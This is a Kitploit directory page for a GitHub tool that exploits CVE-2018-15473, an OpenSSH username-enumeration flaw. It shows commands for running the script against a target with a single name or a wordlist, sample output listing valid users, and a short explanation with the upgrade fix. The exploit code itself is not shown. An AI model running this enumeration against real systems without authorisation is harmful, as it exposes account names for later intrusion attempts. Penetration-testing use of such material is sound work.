Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-15473 — OpenSSH 2.3 < 7.7 - Username Enumeration | Kitploit
Tools/GitHubGitHub/sait-nuri/cve-2018-15473
ReconnaissanceVulnerability AnalysisExploitationInformation GatheringPenetration TestingAuthentication
GitHubsait-nuri/cve-2018-15473

CVE-2018-15473

OpenSSH 2.3 < 7.7 - Username Enumeration

View Repository
421325 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-15473

SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)

Edited version of the original exploit: https://www.exploit-db.com/exploits/45233

  • Converted to Python3
  • Added username wordlist option

How To Run

root@kitploit:~
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
root@kitploit:~
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
root@kitploit:~
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users: 
root
root@kitploit:~
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h

About the Vulnerability:

The system responds differently to valid and invalid authentication attempts. A remote user can send specially crafted requests to determine valid usernames on the target system. Thus, a remote user can determine valid usernames on the target system.

Solution:

OpenSSH server should be upgraded to, or higher than, version 7.7

Download Tool